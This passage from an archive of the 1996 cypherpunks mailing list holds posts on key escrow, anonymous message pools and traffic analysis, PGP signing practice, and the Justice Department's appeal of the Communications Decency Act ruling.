long distance phone records.  The infiltrator was questioned rather closely
about some of his phone calls to official numbers.  He managed to persuade
them that he wasn't a Fed.

Too bad AT&T doesn't use an encrypted open books system to store is records
so that "bad guys" can't abuse those records and put our heroic law
enforcement personnel at risk.

This is a perfect illustration of the fact that technology puts the
government most at risk because it will always be the juiciest target.
"Worth the powder to blow it up with."

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 15:01:07 +0800
To: Eric Davis <cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
Message-ID: <199607030340.UAA22879@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:13 PM 7/2/96 -0700, Eric Davis wrote:
>
>Hughes offers a downlink product called DirectPC.
>The back channel is your regular modem.
>Telco/Analog your requests to their servers 
>and the data is delivered via your DSS dish,
>sent to your PC and decoded via an ISA card. 
>(Opt. DES downlink encryption)
>http://www.direcpc.com/
>
>The downlink is shared 500Kb/s ( I think ).
>Though you can schedule a higher BW channel
>for A/V applications (or so the lit reads).

Anybody know what the total average bps rate for, say, USENET is?


>Think it supports multicast/broadcast by default...

It sounds like it might be a good addition to a network of remailers...
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Wed, 3 Jul 1996 15:06:28 +0800
To: John Pettitt <cypherpunks@toad.com
Subject: Re: SAFE Forum--some comments
Message-ID: <v02140b02adff9a30dcea@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


John Pettitt recalls an question from the audience at the SAFE conference:

>
>One questioner from the audience made an interesting point that given
>that most of american can't seta vcr clock crypto will be totally
>beyond them unless it becomes pervasive ("you can buy it at radio shack").
>

It's not quite that bad. Here are a few (more or less strong) crypto
products you might not know you have:

1. Every Macintosh made since at least 1988 has a secure authentication
   client module in the AppleShare Chooser dialog. When you use it to
   connect to a remote server, it notes that the user information
   is "two-way scrambled." (The server sends a random number challenge
   that the client uses to encrypt the username and password. The
   encrypted information is sent to the server.) All Macintosh systems
   running System 7 or later have the corresponding server software.
   What is interesting about this is that the encryption is completely
   invisible to the user.

2. At least one garage door opener company offers an opener that
   resets itself -- an intruder can't record the signal and play it
   back as the "key code" is one-time only.

However, I agree with the questioner regarding the "set VCR problem."
I suspect that the major problems in deploying strong crypto will
be in marketing and human engineering -- and that the current
regulatory environment adds to the difficulty by removing marketing
incentives to do high-quality human engineering.

Note that the VCR companies have solved the vcr problem by receiving
a timecode from a local television station -- making the problem
invisible to the end user. We should be able to do the same with
strong crypto.

Martin Minow
minow@apple.com










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 3 Jul 1996 15:25:41 +0800
To: cypherpunks@toad.com
Subject: Re: Sameer on C-SPAN
Message-ID: <2.2.32.19960703041841.00b01ffc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:42 PM 7/2/96 -0700, you wrote:
>bluebreeze@nym.jpunix.com (Blue Breeze) wrote:
>>
>> Not everything. No picture of Sameer!? That's what I'd like to see.
>
>There's one in the latest WebSmith magazine.

As well as his article on writing modules for Apache servers...  [BTW, the
issue number is no 4.]  A worthwhile magazine if you write code for web servers.

Now all I have to do is come up with a few ideas for modules...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 3 Jul 1996 13:32:33 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: anonymous mailing lists
In-Reply-To: <199606290404.XAA32220@manifold.algebra.com>
Message-ID: <Pine.SUN.3.94.960702211855.2420A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 28 Jun 1996, Igor Chudov @ home wrote:

> How about this attack: suppose I want to find out who hides behind
> an alias MightyPig@alpha.c2.org and I have the ability to monitor
> all internet traffic. Then I simply start mailbombing that address
> and see whose account gets unusually high traffic volume.
> 
> A nice, albeit quite expensive, way of pretection from traffic analysis
> is to create a mailing list (or a newsgroup) and forward all messages to
> all users of that mailing list or newsgroup. Of course, since messages
> are encrypted, only the recipients will be able to decrypt them.
> 
> This way the list of suspects is all subscribers of that list or
> newsgroup and there is no way to discriminate them.
> 
> Instead of having messages to be sent to all recipients all the time,
> alpha.c2.org may be programmed so that it sends out every message not to
> only one recipient X, but to X and 20 other randomly selected people.
> 
> It apparently makes traffic analysis much harder.
> 
> Then users of alpha.c2.org will have to install mail filters that
> automatically delete all incoming mail not intended to be read by them
> (they can't read such messages anyway).
> 
> 	- Igor.
> 

I think that traffic analysis can be best defeated by powerful filtering
rather than any kind of multiple sending.

Eventually, (as the number of messages to a particular party increases
beyond the number of distractor messages sent with each mailing) it will
be possible to note the statistical difference in the number of messages
send to the random 20 people and the actual recipiant.  A mail bombing
will still reveal the true identity of the addressee as the 20 distractor
address will be randomly selected each time, and the addressee will not.

Instead, one might suggest, the same 20 people should be sent to as
distractors.  Unfortunately this leaves the actual addressee open to
disclosure when he/she responds to alpha forwarded messages (you were
assuming all internet traffic would be monitored, thus the response timing
would be a major clue).

I think the real answer to this is going to be open access pools.  All
encrypted messages will be left in a collective pop account, accessable by
anyone at all.  An agent could easily be written to poll the pop account,
download the entire queue of messages and locally decode and make
available only the ones addressed to the addressee.

I suspect the best policy would be to purge the pop account once a month
of messages older than 2 months.

Traffic analysis will reveal who polls the pop account, but not much else.

I suppose this could even work today if someone wrote a clever agent to
poll alt.anonymous.messages.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 15:43:02 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: But what about the poor?
Message-ID: <199607030429.VAA25505@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 7/2/96 -0500, snow wrote:
>On Tue, 2 Jul 1996, jim bell wrote:
>> stated policy of the escrow agent is that the key owner MUST be informed, 
>> what are the cops gonna do about it? 
>> 
>> Further, how are the cops going to evidence the existence of a valid 
>> warrant?  (As opposed to a forgery?)
>
>     The judge that issues it will digitally sign it. You can check the
>signature block. 


However, what about an UNCOOPERATIVE escrow agent? (one who insists on 
signed paper, or for that matter insists that the judge himself shows up.)   
Or one, at least, who sites himself in Borneo, on the top of a 4000 foot 
mountain, with a 386 laptop computer and a box of floppies, and who promises 
2 hour services to anybody who shows up?  No email, no fax, no phone, no 
light, no motor car, not a single luxury....oooops....sorry about that...not 
even radio.  

Moreover, if the escrow agent is out of the country, can any domestic laws 
force him to divulge keys?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 3 Jul 1996 13:28:49 +0800
To: Joseph Sokol-Margolis <joseph@genome.wi.mit.edu>
Subject: Re:secure WWW on UNsecure servers
In-Reply-To: <v03007405adfa3dc7588f@[18.157.1.107]>
Message-ID: <Pine.SUN.3.94.960702212641.2420B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 28 Jun 1996, Joseph Sokol-Margolis wrote:

> > How might one arrange for these encrypted web pages residing on an
> > (unsecure) server to get decrypted only at the client's machine?


Given the cost of high bandwidth connections and the practical necessity
of surrendering control of the actual machine on which the server resides
to have a decent connection at all, it seems to me that this possibility
should be very seriously considered.

It will allow virtual anonyminity of browsing and (with cooperative ISPs)
allow anonymous maintaince of a page itself.

The other alternative (maintaining control of the server and machine
itself) requires substantially more work to foil traffic analysis and
jurisdictional savvy employment to achieve the same effect.

As usual, the mathamatic defense vastly exceeds the utility of the
physical defense.

To what extent will it be possible, e.g., to run a financial services web
page from a server and still keep the server staff from knowing what the
page is?

It provides the ISP providing the server with liability protection, and
presents many more anonymous possibilities.

This, clearly, must be the best answer to turning web pages and WWW
transactions into the kind of personal and private exchanges that PGP
affords e-mail today.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jul 1996 15:25:05 +0800
To: cypherpunks@toad.com
Subject: Re: SAFE Forum--some comments
Message-ID: <199607030434.VAA25837@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:00 PM 7/2/96 -0700, Bill Frantz wrote:
>At  2:47 PM 7/2/96 -0700, Lile Elam wrote:
>>The comment I kept hearing over and over was that we have to 
>>educate the public about what cryptography is and why it's important
>>to everyone using computers to communicate. This public includes
>>people who are not on the net and those who don't even know what the 
>>Internet is. 
>
>Absolutely!  The image of postcards vs. letters may be the most effective
>metaphor.


However, that AT+T fellow who revealed the phone records to the militia 
group would also be an appropriate comparison to destroy the "key-escrow" 
idea.  I assume AT+T had procedures in place which were SUPPOSED TO prevent 
this.  Well, key-escrow agents "will" also have similar procedures.  Why 
should we assume they will be more reliable?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 3 Jul 1996 13:23:54 +0800
To: "David F. Ogren" <ogren@cris.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607022343.TAA21050@darius.cris.com>
Message-ID: <199607030142.VAA29584@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I've noticed recently that two PGP programmers (Mr. Zimmerman and Mr. 
> Atkins) do not seem to PGP clearsign their messages to this list. In fact, 
> a surprisingly small percentage of messages on the C-punk list are signed. 
> This despite the fact that the average subscriber is at least literate in 
> PGP.

Actually, I don't PGP sign my messages because 95% of the time my
connection to my mail host (the machine on which I read and respond to
mail) is insecure.  Composing the message, bringing the message to my
local machine, running PGP, re-uploading the message, and sending it
is a big deal and I don't consider it important enough for my everyday
posts.

When I send out notices that I consider important I do sign them.  But
that is fairly rare (at the moment).

Basically, I refuse to type my passphrase over the net, which signing
all my messages (this one included) would require.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Wed, 3 Jul 1996 13:31:29 +0800
To: ceridwyn@wolfenet.com
Subject: Re: hard drive encryption
Message-ID: <960702214331_229961662@emout07.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


you told him to take his hard drive with him. but me on the other hand am
wondering because I want my drive secure from everyone. While im here and not
here. And Im definitely not going to take myt drive everywhere hehehe
Sooo what other programs are out there?? Any shareware versiob..trials..etc..
that anyone knows any WWW sites of?
Tanks!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 3 Jul 1996 13:52:58 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: fbi botches intel "ecspionage" case
In-Reply-To: <199606291925.MAA12512@netcom3.netcom.com>
Message-ID: <Pine.SUN.3.94.960702214703.2420C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 29 Jun 1996, Vladimir Z. Nuri wrote:

> 
> "economic espionage" (ecspionage?) is in full swing as being 
> promoted as the new bogeyman to justify spending billions of
> dollars to our intelligence agencies, both military and
> the FBI.


Careful, the FBI only does counter-intel in this context.

> 
> we already have a very good example where this has
> backfired. I was watching Nightline on Tues night or
> so in which there was info about how the FBI helped
> get an informant into Intel in a *very* sensitive
> position, where he was able to film the pentium chip
> plans. he said he sold them, as I recall,
> to iraq, syria, china, etc.

Again, why was the FBI putting the informant into Intel?  It was almost
100% certain to be related to a criminal or counter-intel matter.  The
fact that the informant may have appropriated information in the process
and sold it to the highest bidder is a rebuke against the FBI's informant
selection process, not against economic or industrial espionage, which the
FBI does not do.

> somehow we have missed a good public debate about 
> ecspionage in the country. there were a few NYT 
> editorials, but it is clearly being used as a very
> major aspect of promoting the new post-cold-war spy
> and intelligence strategy without almost any notice
> by major analyists.

It has gained a great deal of notice, you just have to know where to look.
I suggest looking over e.g., the economist, foreign affairs, foreign
policy, the international journal of intelligence and counterintelligence,
signal....

> 
> I was thinking about all the objections I had to the
> FBI ecspionage treatment that were never raised on the
> program:


I don't think you have a firm grasp on the role or part the FBI took in
this matter.

> 2. we have a tradition of separation of church and state in
> this country, and also separation of the public government
> and private industry. suddenly we have the FBI saying they
> want to infiltrate companies to deal with economic espionage.

Typically this is with the consent of the companies, or in response to
complaints from same.  This is COUNTER intelligence, not espionage or
"ecspionage" (A silly and non-sensical term even if you were constructing
it correctly here).

> well, these companies have their own policy, and what do
> they gain by having a government agency working inside them?

See my comment above.

> in the above case I note, it led to exactly the *opposite*
> of what was intended: the theft of *highly*sensitive* plans
> by an FBI mole.

Not the first time, certainly will not be the last.  Again, it's a
question of procedure, not of the validity of the program.

> 3. hence, one wonders if the FBI could do a better job of
> combating ecspionage

I believe you mean economic intelligence here, not economic espionage, or
industrial espionage, or "ecspionage."

> if someone else can give more info on this case (apparently
> a book is coming out about it or something) including the
> guy's name, I'd appreciate it, I didn't take any notes so
> this is a bit fuzzy.

Try to be more careful about the roles of the various parties in your
(otherwise interesting) commentary.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 3 Jul 1996 14:13:19 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: FTS2000 and Encryption?
In-Reply-To: <199606302206.SAA01870@nrk.com>
Message-ID: <Pine.SUN.3.94.960702220420.2420D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 30 Jun 1996, David Lesher wrote:

> > I imagine that we'll see contining developments in the STU-III area (the
> > most popular crypto phone in Government use), as well as new devices
> > supporting Type I and Type II crypto for use on the FTS2000 nets.
> 
> I've heard an ISDN STU-III is either out or coming RSN.

I have an AT&T prototype.  I don't know if they are freely available yet.

> 
> One bugaboo I recall was that FTS2000 would not let us make a frac
> T1 off-net connection. Alas, that included the remote diagnostic
> number of the equip. mfgr ;-{
> 
> -- 
> A host is a host from coast to coast.................wb8foz@nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 3 Jul 1996 14:16:09 +0800
To: cypherpunks@toad.com
Subject: F-C Dispatch #16: DoJ files appeal, Supreme Court ho!
Message-ID: <v01510108adff93e472e0@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain






-----------------------------------------------------------------------------
                       Fight-Censorship Dispatch #16
-----------------------------------------------------------------------------
             Justice Department files appeal, Supreme Court ho!
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this dispatch: Justice Department's appeal means long, tortuous process
                  A mysterious "Order on Motion for Clarification"
                  Text of Justice Department's Notice of Appeal


July 2, 1996

WASHINGTON, DC -- The Department of Justice yesterday appealed the
Philadelphia court's decision striking down the Communications Decency
Act, a move that sets the stage for a long, tortuous climb to the
Supreme Court.

The government's "Notice of Appeal" is a terse, two-page statement
saying they "hereby appeal" the "Adjudication and Order entered June
12," the day the special three-judge panel unanimously declared the CDA
to be unconstitutional and blocked the Justice Department from
enforcing it.

Next move is the DoJ's. They have until September 1 to file a
"jurisdictional statement" arguing that the Supreme Court should hear
their appeal.

The Supreme Court doesn't automatically have to accept jurisdiction,
notes Ann Beeson, an attorney with the ACLU. "The Supreme Court can
still decline to exercise jurisdiction over the case," she says,
adding: "They do not have the same kind of discretion they have in
a cert petition."

All the DoJ has to do is convince the Supremes that there's "still a
substantial federal question," says Beeson. "If they're not convinced
there is a question, they can decline the appeal."

But by all accounts, there's precious little chance of that happening.

After Justice files the jurisdictional statement, our attorneys have 30
days to file a response -- and then when the next term begins on October
7, the Supremes will meet to discuss the case. (If the procedure is
anything like granting cert, the votes will be cast in a secret
conference attended only by the justices and the actual vote won't be
disclosed.)

The climb to the nation's highest court will be only partly over by
then, since the court's decision to consider our case marks the start of
the briefing schedule. The government will have 45 more days to file
their arguments saying why the Philadelphia decision was wrong; we have
30 more days to rebut.

If the Department of Justice -- hardly the speediest bureaucracy in DC
-- uses all of their alloted time, the paperwork won't be complete
until Christmas.

And then the Supremes need plenty of time to digest it.

So everyone's best guess is that the Supreme Court will hear the
combined ACLU and ALA coalition lawsuits early next year -- just in
time for the rescheduled Electronic Freedom March on the nation's
Capitol.

As I wrote in a recent HotWired column:

  "The ACLU predicts the Supreme Court will issue a decision near the
   close of the next term, which ends in July 1997 -- just in time for
   Congress to try again."


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
            THE MYSTERIOUS "ORDER ON MOTION FOR CLARIFICATION"
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

You might be surprised by a mysterious sentence in the text of the
Justice Department's notice of appeal talking about a "Order on Motion
for Clarification" the court issued on June 28.

Not to worry. The judges ruled so vigorously in our favor that the DoJ
wanted to be sure the government could prosecute anyone they think
may violate other parts of the CDA.

"Because of the wording of the court's actual order, they unwittingly
called into question whether the DoJ could enforce the provisions of
the CDA that we didn't challenge," says Ann Beeson from the ACLU.

The Philadelphia court quickly issued the clarification.


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
             TEXT OF JUSTICE DEPARTMENT'S "NOTICE OF APPEAL"
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+


                IN THE UNITED STATES DISTRICT COURT
             FOR THE EASTERN DISTRICT OF PENNSYLVANIA

_____________________________________________________________

AMERICAN CIVIL LIBERTIES UNION,    :    CIVIL ACTION
    et al., Plaintiffs;            :    No. 96-963
                                   :
               v.                  :
                                   :
JANET RENO, in her official        :
capacity as Attorney General of    :
the United States, Defendant.      :

_____________________________________________________________

AMERICAN LIBRARY ASSOCIATION,      :    CIVIL ACTION
  INC., et al., Plaintiffs;        :    No. 96-1458
                                   :
               v.                  :
                                   :
UNITED STATES DEP'T OF JUSTICE,    :
   et al., Defendants.             :

_____________________________________________________________


                    DEFENDANTS' NOTICE OF APPEAL

Notice is hereby given that defendant Janet Reno, in her official
capacity as Attorney General of the United States, hereby appeals,
pursuant to section 561(b) of the Telecommunications Act of 1996, Pub.
L. No. 104-104, Sec.561(b), 110 Stat. 143, to the Supreme Court of the
United States from the Adjudication and Order entered June 12, 1996, as
clarified by the Order on Motion for Clarification entered on June 28,
1996, in American Civil Liberties Union et al. v. Reno, Civ. A. No.
96-0963 (E.D. Pa.).

Notice is also hereby given that defendants United States Department of
Justice and Janet Reno, in her official capacity as Attorney General of
the United States, hereby appeal, pursuant to section 561(b) of the
Telecommunications Act of 1996, Pub. L. No. 104-104, Sec.561(b), 110
Stat. 143, to the Supreme Court of the United States from the
Adjudication and Order entered June 12, 1996, as clarified by the Order
on Motion for Clarification entered on June 28, 1996, in American
Library Ass'n, et al. v. Department of Justice, et al., Civ. A. No.
96-1458 (E.D. Pa.).


Respectfully Submitted,

MICHAEL R. STILES
United States Attorney

MARK R. KMETZ
Assistant United States Attorney

FRANK W. HUNGER
Assistant Attorney General
Civil Division

DENNIS G. LINDER
Director, Federal Programs Branch

[signed]
ANTHONY J. COPPOLINO
Trial Attorney

[signed]
JASON R. BARON
PATRICIA M. RUSSOTTO
Trial Attorneys
United States Department of Justice
Civil Division
Federal Programs Branch
901 E. Street N.W.
Washington, Dc 20530
Tel: (202) 514-4782

Date: July 1, 1996


-----------------------------------------------------------------------------

MEA CULPA. In F-C Dispatch #13, I wrote that the Washington Post ran an
article "on the first page of the Outlook section bashing
"self-indulgent dross" and "crap" on the Net. I neglected to mention
that John Schwartz and Kara Swisher had an excellent rebuttal inside.

-----------------------------------------------------------------------------

Mentioned in this CDA update:

  HotWired column on what kind of net-censorship Congress will try next:
    http://www.hotwired.com/netizen/96/24/declan4a.html
  Fight-Censorship Dispatch #13:
    http://fight-censorship.dementia.org/dl?num=2741

  Fight-Censorship list   <http://fight-censorship.dementia.org/top/>
  Int'l Net-Censorship    <http://www.cs.cmu.edu/~declan/international/>
  Justice on Campus       <http://joc.mit.edu/>

This document and previous Fight-Censorship Dispatches are archived at:
  <http://fight-censorship.dementia.org/top/>

To subscribe to future Fight-Censorship Dispatches and related
announcements, send "subscribe fight-censorship-announce" in the body
of a message addressed to:
  majordomo@vorlon.mit.edu

Other relevant web sites:
  <http://www.aclu.org/>
  <http://www.cdt.org/>
  <http://www.vtw.org/>
  <http://www.cpsr.org/>
  <http://www.epic.org/>
  <http://www.ala.org/>
  <http://www.eff.org/>
  <http://joc.mit.edu/>

-----------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Wed, 3 Jul 1996 09:16:22 +0800
To: "'Cypherpunks list'" <cypherpunks@toad.com>
Subject: RE: SAFE Forum (We sell decryption hardware)
Message-ID: <01BB6863.DF27D040@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote
>We sell RC4, 40 bit decryption hardware (based on AMD29000) for $16K.  FPGA
>devices for breaking DES in 7 days for $1M.  [Eric Thompson, Access Data]

What? Do you have some information about this ad (e. g. eMail)?
I know some bank that would be very interested about this possibility (not for use it, but as an impulse to change their systems).
Best regards,
Jean-Paul

~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 3 Jul 1996 16:52:28 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: But what about the poor?
In-Reply-To: <199607030031.RAA12438@mail.pacifier.com>
Message-ID: <Pine.LNX.3.93.960702221558.796B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, jim bell wrote:
> stated policy of the escrow agent is that the key owner MUST be informed, 
> what are the cops gonna do about it? 
> 
> Further, how are the cops going to evidence the existence of a valid 
> warrant?  (As opposed to a forgery?)

     The judge that issues it will digitally sign it. You can check the
signature block. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 3 Jul 1996 16:18:53 +0800
To: Lile Elam <elam@art.net>
Subject: Re: SAFE Forum--some comments
In-Reply-To: <199607022147.OAA10677@art.net>
Message-ID: <Pine.GUL.3.94.960702220919.28261B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, Lile Elam wrote:

> So, now I have some ideas on what I, as an individual can do to
> help.  Educating poeple about crypto. I work with alot of artists
> on the net (~300+) and will introduce crytography to them. We'll
> think of some cool ways to implement it in our work and in the
> process will learn how to use it. :)

A good toy to share might be CryptaPix, an image viewer with integrated
crypto, http://execpc.com/~kbriggs/

as seen on comp.os.ms-windows.announce on 5/24.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 3 Jul 1996 16:20:00 +0800
To: Ulf Moeller <um@c2.org>
Subject: Re: Message pools _are_ in use today!
In-Reply-To: <m0ubEvG-00006nC@ulf.mali.sub.org>
Message-ID: <Pine.GUL.3.94.960702221832.28261C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Ulf Moeller wrote:

> >alt.anonymous.messages is not an ideal message pool-- it is a hack.
> >(Granted, it *is* a really cool, clever, and practically useful hack.)
> 
> I agree that alt.anonymous.messages is not perfect. But if you
> download all articles and don't post to alt.anonymous.messages
> without using a remailer, the only real threat are denial of
> service attacks with cancel messages etc.

You could also read alt.anonymous.messages by pointing The Anonymizer at
AltaVista. Their news feed expires pretty quick, but it's probably just as
fast and reliable as yours, if not better.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 3 Jul 1996 17:11:02 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: LE Risks with No Crypto
In-Reply-To: <2.2.32.19960703002028.00ba3b24@panix.com>
Message-ID: <Pine.GUL.3.94.960702222226.28261D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, Duncan Frissell wrote:

> Too bad AT&T doesn't use an encrypted open books system to store is records
> so that "bad guys" can't abuse those records and put our heroic law
> enforcement personnel at risk.

I keep hearing suggestions like this, but I don't think they'd work. If you
needed a digital key to grok phone records, then that digital key would be
passed around just as casually as the current passwords. Any organization
that large, where 99% of the information is banal and uninteresting 99% of
the time, cannot keep secrets. It's unreasonable to expect them to. It
doesn't make business sense to promise security, because when they fail to
deliver, as they can't, they'll get their ass sued.

I recently had a practical joker call up all the magazines to which I was
subscribed and change my address to that of the local hospital, where these
practical jokers were suggesting they'd like to send me. There is no
security against this kind of attack, because it's just not in most people's
threat profile. This kind of thing is annoying, but it can't be helped. 
Adding a reasonable level of security to such an insignificant system would
increase the cost of that system by several orders of magnitde. It's just
not worth it.

In the unicorn of Color's relative absence, it falls on me to stress that
you can't trust organizations to protect your privacy. If you need to
participate in an insecure system, and everybody does, use cash, and use
psedonyms. 

> This is a perfect illustration of the fact that technology puts the
> government most at risk because it will always be the juiciest target.
> "Worth the powder to blow it up with."

This is true.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 3 Jul 1996 17:01:42 +0800
To: Ulf Moeller <um@c2.org>
Subject: Re: Info on alleged new German digital wiretapping law?
In-Reply-To: <m0ubEel-00006nC@ulf.mali.sub.org>
Message-ID: <Pine.GUL.3.94.960702223715.28261E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Ulf Moeller wrote:

> Rich Graves <llurch@networking.stanford.edu> writes:
> 
> > http://fight-censorship.dementia.org/fight-censorship/dl?num=3027
> >
> >and in alt.fan.ernst-zundel. What's up?
> 
> The report is correct.
> 
> The mainstream press has completely ingnored the wiretap legislation,
> probably because it is part of the long-awaited new telecommunications
> law to end the Telekom monopoly.

We 'merkins were probably just a little more aware.

So what's the prospect for implementation? The claim is that law enforcement
is supposed to have a back door to every computer system. Are we talking
about escrow of root passwords, or what? That's the bit I found loony, given
what I've heard (from you and others) about the generally semi-clueful
technology and telecoms ministries. Is it THAT bad?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 3 Jul 1996 17:08:01 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607030142.VAA29584@toxicwaste.media.mit.edu>
Message-ID: <Pine.GUL.3.94.960702224118.28261F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 2 Jul 1996, Derek Atkins wrote:

> Actually, I don't PGP sign my messages because 95% of the time my
> connection to my mail host (the machine on which I read and respond to
> mail) is insecure.  Composing the message, bringing the message to my

"Me too," though I recently created a 512-bit key just for the purpose of
such insecure signing. As long as people understand that that key simply
means "this is either me, or someone who has gone to the trouble of cracking
root here, or someone who spent a couple weeks brute-forcing this key," it's
useful to prevent casual attacks.

Several others are doing the same thing... I know all the NoCeM posters and
most of the newsgroup moderators using PGPMoose have created suuch secondary
keys.

- -rich
 finger or send mail with subject line "send pgp key" if you want 'em

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMdoJ+JNcNyVVy0jxAQH7fwIAvK/GWCSXtoDyZWIC+rffKjv/VNbQL/J8
nvabWe7DC6NMp6iGmmZCaIkuvD+TON6rEpu3xatyim0R8ILQoSPyfg==
=/wh3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 3 Jul 1996 09:57:15 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199607022101.XAA08988@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06.39 AM 7/2/96 -0700, anonymous-remailer@shell.portal.com wrote:
